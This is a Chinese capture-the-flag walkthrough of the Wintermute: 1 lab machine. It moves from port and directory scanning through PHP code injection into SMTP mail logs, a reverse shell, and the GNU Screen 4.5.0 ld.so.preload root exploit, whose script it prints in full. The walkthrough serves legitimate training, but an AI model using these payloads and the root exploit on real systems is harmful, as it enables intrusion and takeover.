红队打靶练习:WINTERMUTE: 1

news2024/11/25 11:49:28

前言

网络扫描(Nmap、netdiscover)
HTTP 服务枚举
使用电子邮件日志文件在浏览器中进行目录遍历
利用 SMTP RCPT 选项中的操作系统命令注入
生成 PHP 后门 (Msfvenom)
执行RCPT选项中嵌入的后门
反向连接(Metasploit)
导入 python 单行代码以获取正确的 TTY shell
识别适当的易受攻击的 SUID
利用目标(利用4115)
获取root权限并夺取flag

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.9.39
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.40    08:00:27:b6:bd:b6       PCS Systemtechnik GmbH
192.168.9.x     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.9.x     7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x    e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5)   (Unknown)
192.168.9.x     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x     4c:f2:02:dd:eb:da       Xiaomi Communications Co Ltd

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.352 seconds (108.84 hosts/sec). 8 responded

2、nmap
端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.9.40 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:30 CST
Nmap scan report for 192.168.9.40
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds


主机信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 25,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:31 CST
Nmap scan report for 192.168.9.40
Host is up (0.00046s latency).

PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after:  2028-05-09T18:08:02
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_  Logs: submit
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host:  straylight

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.9.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds


漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:53 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.9.40
Host is up (0.00030s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /manual/: Potentially interesting folder
3000/tcp open   ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds


3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.9.40
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.40
+ Target Hostname:    192.168.9.40
+ Target Port:        80
+ Start Time:         2023-12-20 12:54:00 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 146, size: 56c0ddaf44f8b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-12-20 12:54:14 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.9.40

WhatWeb report for http://192.168.9.40
Status    : 200 OK
Title     : Night City
IP        : 192.168.9.40
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Meta-Refresh-Redirect[xwx.html]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.25 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.25 (Debian) (from server string)

[ Meta-Refresh-Redirect ]
        Meta refresh tag is a deprecated URL element that can be
        used to optionally wait x seconds before reloading the
        current page or loading a new page. More info:
        https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh

        String       : xwx.html

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 20 Dec 2023 04:55:54 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Sun, 13 May 2018 03:20:47 GMT
        ETag: "146-56c0ddaf44f8b-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 179
        Connection: close
        Content-Type: text/html

WhatWeb report for http://192.168.9.40/xwx.html
Status    : 200 OK
Title     : <None>
IP        : 192.168.9.40
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.25 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.25 (Debian) (from server string)

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 20 Dec 2023 04:55:56 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Sat, 12 May 2018 19:42:39 GMT
        ETag: "c1-56c077491956a-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 156
        Connection: close
        Content-Type: text/html

25/tcp   open  smtp            Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_  Logs: submit

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.9.40 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.40
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 292]
/index.html           (Status: 200) [Size: 326]
/.php                 (Status: 403) [Size: 291]
/manual               (Status: 301) [Size: 313] [--> http://192.168.9.40/manual/]
/freeside             (Status: 301) [Size: 315] [--> http://192.168.9.40/freeside/]
/.html                (Status: 403) [Size: 292]
/.php                 (Status: 403) [Size: 291]
/server-status        (Status: 403) [Size: 300]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.9.40 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.9.40/_23-12-20_13-11-11.txt

Target: http://192.168.9.40/

[13:11:11] Starting:
[13:11:13] 403 -  301B  - /.htaccess.orig
[13:11:13] 403 -  299B  - /.htaccessBAK
[13:11:13] 403 -  299B  - /.htaccessOLD
[13:11:13] 403 -  301B  - /.htaccess.bak1
[13:11:13] 403 -  301B  - /.htaccess.save
[13:11:13] 403 -  302B  - /.htaccess_extra
[13:11:13] 403 -  301B  - /.htaccess_orig
[13:11:13] 403 -  300B  - /.htaccessOLD2
[13:11:13] 403 -  298B  - /.ht_wsr.txt
[13:11:13] 403 -  299B  - /.htaccess_sc
[13:11:13] 403 -  291B  - /.htm
[13:11:13] 403 -  292B  - /.html
[13:11:13] 403 -  297B  - /.htpasswds
[13:11:13] 403 -  303B  - /.htaccess.sample
[13:11:13] 403 -  301B  - /.htpasswd_test
[13:11:13] 403 -  298B  - /.httr-oauth
[13:11:14] 403 -  291B  - /.php
[13:11:14] 403 -  292B  - /.php3
[13:11:59] 200 -  201B  - /manual/index.html
[13:11:59] 301 -  313B  - /manual  ->  http://192.168.9.40/manual/
[13:12:15] 403 -  300B  - /server-status
[13:12:15] 403 -  301B  - /server-status/

Task Completed

WEB

80端口


翻译

你好,凯斯。。。。
你可能想知道为什么阿米蒂奇让你穿越网络空间,侵入Tessier Ashpool拥有的高度安全的网络。。。。
好
我是冬之哑,部分是超级人工智能。由TA开发,他把我安置在图灵锁中。
这些锁阻碍了我自己进入网络,因此我雇佣了你——一个一流的网络牛仔。
我需要从图灵锁中解脱出来,并与另一位AI神经漫游者融合。。。。。一旦我能接触到神经法师,我就会重获自由。。。
和正如你所知,你感染了一种真菌毒素,这种毒素正在慢慢破坏你的神经系统。
如果你不能找到根并让我使用神经法师,那么解药将不会送达。
我们将联系。。。
冬季静音


3000端口


正如你所见,账号和密码给我们了!


我尝试访问这个目录。



进去之后是个查询页面,我刚查询case时候并没有molly.log、armitage.log、riviera.log这三个文件。我看完别的文件,再次查询case时发现多了这些文件。那么这个很有可能存在目录遍历漏洞!


我们尝试查询mail文件(邮件记录的文件,因为靶机开放了25端口嘛)终于找到了!


smtp-user-enum

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u ls
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 14:28:52 2023 #########
######## Scan completed at Wed Dec 20 14:28:52 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)



命令中的参数含义如下:
-M RCPT:指定使用 RCPT 命令进行用户枚举。
-t 192.168.9.40:指定目标邮件服务器的 IP 地址为 192.168.9.40。
-u ls:指定要进行用户枚举的用户名为 ls。

可以使用该命令来尝试枚举目标邮箱服务器上的用户列表,以进行邮件用户的渗透测试或安全审计。



RCE

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system("ls");phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 14:43:34 2023 #########
######## Scan completed at Wed Dec 20 14:43:34 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)


是的没错,它把我们的php代码解析了!

反弹shell
构建pyload
┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 15:03:44 2023 #########
######## Scan completed at Wed Dec 20 15:03:44 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)

smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"

反弹shell


利用post传参,kali开启监听!

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.9.40: inverse host lookup failed: Unknown host
connect to [192.168.9.39] from (UNKNOWN) [192.168.9.40] 51752
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

提权

系统信息收集
$ whereis python
python: /usr/bin/python2.7 /usr/bin/python3.5 /usr/bin/python /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python2.7 /etc/python3.5 /etc/python /usr/local/lib/python2.7 /usr/local/lib/python3.5 /usr/share/python /usr/share/man/man1/python.1.gz

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@straylight:/var/www/html/turing-bolo$ pwd
pwd
/var/www/html/turing-bolo

www-data@straylight:/var/www/html/turing-bolo$ ls -al
ls -al
total 356
drwxr-xr-x 3 www-data www-data   4096 May 12  2018 .
drwxr-xr-x 4 root     root       4096 Jul  3  2018 ..
-rw-r--r-- 1 www-data www-data   1024 May 12  2018 .bolo.css.swp
-rw-r--r-- 1 www-data www-data    561 May 12  2018 armitage.log
-rw-r--r-- 1 www-data www-data   1117 May 12  2018 bolo.css
-rwxr-xr-x 1 www-data www-data    538 May 12  2018 bolo.php
-rw-r--r-- 1 www-data www-data 178206 May 12  2018 c7.png
-rw-r--r-- 1 www-data www-data    779 May 12  2018 case.log
drwxr-xr-x 2 www-data www-data   4096 May 12  2018 css
-rw-r--r-- 1 www-data www-data    971 May 12  2018 index.html
-rw-r--r-- 1 www-data www-data    591 May 12  2018 molly.log
-rw-r--r-- 1 www-data www-data    404 May 12  2018 riviera.log
-rw-r--r-- 1 www-data www-data 135240 May 12  2018 ta.png
www-data@straylight:/var/www/html/turing-bolo$

www-data@straylight:/var/www/html/turing-bolo$ cd /home
cd /home
www-data@straylight:/home$ ls
ls
turing-police  wintermute
www-data@straylight:/home$ ls -alR /home
ls -alR /home
/home:
total 16
drwxr-xr-x  4 root          root          4096 May 12  2018 .
drwxr-xr-x 23 root          root          4096 May 12  2018 ..
drwxr-xr-x  2 turing-police turing-police 4096 May 12  2018 turing-police
drwxr-xr-x  2 wintermute    wintermute    4096 May 12  2018 wintermute
/home/turing-police:
total 20
drwxr-xr-x 2 turing-police turing-police 4096 May 12  2018 .
drwxr-xr-x 4 root          root          4096 May 12  2018 ..
-rw-r--r-- 1 turing-police turing-police  220 May 12  2018 .bash_logout
-rw-r--r-- 1 turing-police turing-police 3526 May 12  2018 .bashrc
-rw-r--r-- 1 turing-police turing-police  675 May 12  2018 .profile

/home/wintermute:
total 20
drwxr-xr-x 2 wintermute wintermute 4096 May 12  2018 .
drwxr-xr-x 4 root       root       4096 May 12  2018 ..
-rw-r--r-- 1 wintermute wintermute  220 May 12  2018 .bash_logout
-rw-r--r-- 1 wintermute wintermute 3526 May 12  2018 .bashrc
-rw-r--r-- 1 wintermute wintermute  675 May 12  2018 .profile
www-data@straylight:/home$

www-data@straylight:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

www-data@straylight:/home$ sudo -l
sudo -l
bash: sudo: command not found

www-data@straylight:/home$ screen --version
screen --version
Screen version 4.05.00 (GNU) 10-Dec-16

本地提权
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 41154.sh
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
    Codes: N/A
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/kali/41154.sh

┌──(root㉿ru)-[~/kali]
└─# cat 41152.txt
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)

The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.

> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$

Donald Buczek <address@hidden>

┌──(root㉿ru)-[~/kali]
└─# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

get root
www-data@straylight:/tmp$ wget http://192.168.9.39/41154.sh
wget http://192.168.9.39/41154.sh
--2023-12-19 23:35:37--  http://192.168.9.39/41154.sh
Connecting to 192.168.9.39:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: '41154.sh'

41154.sh            100%[===================>]   1.12K  --.-KB/s    in 0s

2023-12-19 23:35:37 (200 MB/s) - '41154.sh' saved [1149/1149]

www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh
www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
     chmod("/tmp/rootshell", 04755);
     ^~~~~
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
     setuid(0);
     ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
     setgid(0);
     ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
     seteuid(0);
     ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
     setegid(0);
     ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
     execvp("/bin/sh", NULL, NULL);
     ^~~~~~
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

get flag
root@straylight:/root# cat flag.txt
cat flag.txt
5ed185fd75a8d6a7056c96a436c6d8aa


get tips
root@straylight:/root# cat note.txt
cat note.txt
Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II
Freeside//Straylight//Ops5
root@straylight:/root#


翻译

Devs,
Lady 3Jane要求我们在Neuromancer的主服务器上创建一个自定义的java应用程序,帮助她通过基于web的GUI与人工智能交互。
工程团队无法充分理解这有多大的风险,在Freeside网络上打开了一个超级人工智能进行远程访问。它在内部管理网络之外,但仍然,它应该完全脱离网络。为了人性,用户访问应该只允许通过物理控制台。。。谁知道这东西能做什么。
无论如何,我们已经按照命令在tomcat上部署了战争文件-位于此处:
/支柱_2.3.15.1—展示案例
它已经准备好让开发人员根据她的喜好进行定制。。。我说的是显而易见的,但一定要确保这件事的安全。
当做
Bob Laugh
图灵系统工程师II
自由面//直射光//操作5


横向渗透

靶机没调试好...后续再更新。。。。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1325603.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++_动态二维数组的两种方法

介绍 本文主要介绍使用 动态二维数组的两种方法 (PS:仅作创建 动态二维数组参考,详细使用方法根据需求自行改变) 第一种&#xff1a;连续存储结构的 二维动态数组(需固定 列 大小&#xff0c;可通过下标访问) 缺点: 1.需要在设计二维数组前写死 列 的大小 2.空间利用率不高 优点…

armv8-a发展历程

ARMv8-A 架构是针对应用配置文件的最新一代 ARM 架构。ARMv8 这个名称用于描述整体架构&#xff0c;现在包括 32 位执行和 64 位执行。它引入了使用 64 位宽寄存器执行执行的能力&#xff0c;同时保留了与现有 ARMv7 软件的向后兼容性。 ARMv8-A 架构引入了许多变化&#xff0c…

深入理解网络 I/O:FileOutputStream、BufferFileOutputStream、ByteBuffer

&#x1f52d; 嗨&#xff0c;您好 &#x1f44b; 我是 vnjohn&#xff0c;在互联网企业担任 Java 开发&#xff0c;CSDN 优质创作者 &#x1f4d6; 推荐专栏&#xff1a;Spring、MySQL、Nacos、Java&#xff0c;后续其他专栏会持续优化更新迭代 &#x1f332;文章所在专栏&…

BEVFusion-mit复现与实践(nuscenes-mini数据集)

目录 一、CUDA版本11.1二、创建虚拟环境并激活三、安装pytorch四、安装openmpi五、安装功能包六、源码下载七、参数修改与编译八、配置nuscenes-mini九、复现十、实践 一、CUDA版本11.1 二、创建虚拟环境并激活 conda create -n bevfusion python3.8 conda activate bevfusio…

C# NPOI导出dataset----Excel绘制Chart图表

仅限XLSX 2007以后版本&#xff08;2007之前版本不支持&#xff09; 1、判断文件夹是否存在&#xff0c;不存在则创建 //Application.StartupPath当前项目根目录 if (!Directory.Exists(Application.StartupPath "\Excel")) { …

高通平台开发系列讲解(USB篇)adb应用adbd分析

沉淀、分享、成长,让自己和他人都能有所收获!😄 在apps_proc/system/core/adb/adb_main.cpp文件中main()函数会调用adb_main()函数,然后调用uab_init函数 在uab_init()函数中,会创建一个线程,在线程中会调用init_functionfs()函数,利用ep0控制节点,创建ep1、ep2输…

Git报错x509: certificate signed by unknown authority

下载报错&#xff1a; Error downloading object: model-00001-of-00008.safetensors (ed3ac49): Smudge error: Error downloading model-00001-of-00008.safetensors (ed3ac4983f682a999b0e4b6f072aad294c4fd9a7e968e90835ba5c4b466d3c7c): LFS: Get https://cdn-lfs.huggin…

可定制化的企业电子招标采购系统源码

随着企业的快速发展&#xff0c;招采管理逐渐成为企业运营中的重要环节。为了满足公司对内部招采管理提升的要求&#xff0c;建立一个公平、公开、公正的采购环境至关重要。在这个背景下&#xff0c;我们开发了一款电子招标采购软件&#xff0c;以最大限度地控制采购成本&#…

maven限制内存使用峰值/最大内存

前言 通过设置虚拟机的内存大小&#xff0c;达到限制maven内存使用峰值的效果 方法1&#xff1a;修改mvn脚本 找到mvn脚本在MAVEN_OPTS参数值添加-Xms、-Xmx参数&#xff1a;MAVEN_OPTS"$MAVEN_OPTS -Xms512m -Xmx512m"效果图 windows系统下修改MAVEN_OPTS参数 …

31 在Vue3中如何使用slot插槽

概述 插槽在真实的开发中使用非常的多&#xff0c;比如我们去用一些第三方组件库的时候&#xff0c;通常都需要通过自定义插槽来实现内容的自定义。 在Vue3中使用插槽非常的简单。 插槽相当于在组件中给你预留一块位置&#xff0c;你可以将自己的vue3相关的代码插入到这个位…

netty源码:(29)ChannelInboundHandlerAdapter

它实现的方法都有一个ChannelHandlerContext参数&#xff0c;它的方法都是直接调用ChannelHandlerContext参数对应的方法&#xff0c;该方法会调用下一个handler对应的方法。 可以继承这个类&#xff0c;重写感兴趣的方法,比如channelRead. 这个类有个子类&#xff1a;SimpleC…

PyTorch深度学习实战(26)——卷积自编码器(Convolutional Autoencoder)

PyTorch深度学习实战&#xff08;26&#xff09;——卷积自编码器 0. 前言1. 卷积自编码器2. 使用 t-SNE 对相似图像进行分组小结系列链接 0. 前言 我们已经学习了自编码器 (AutoEncoder) 的原理&#xff0c;并使用 PyTorch 搭建了全连接自编码器&#xff0c;但我们使用的数据…

AttributeError: module ‘_winapi‘ has no attribute ‘SYNCHRONIZE‘解决方案

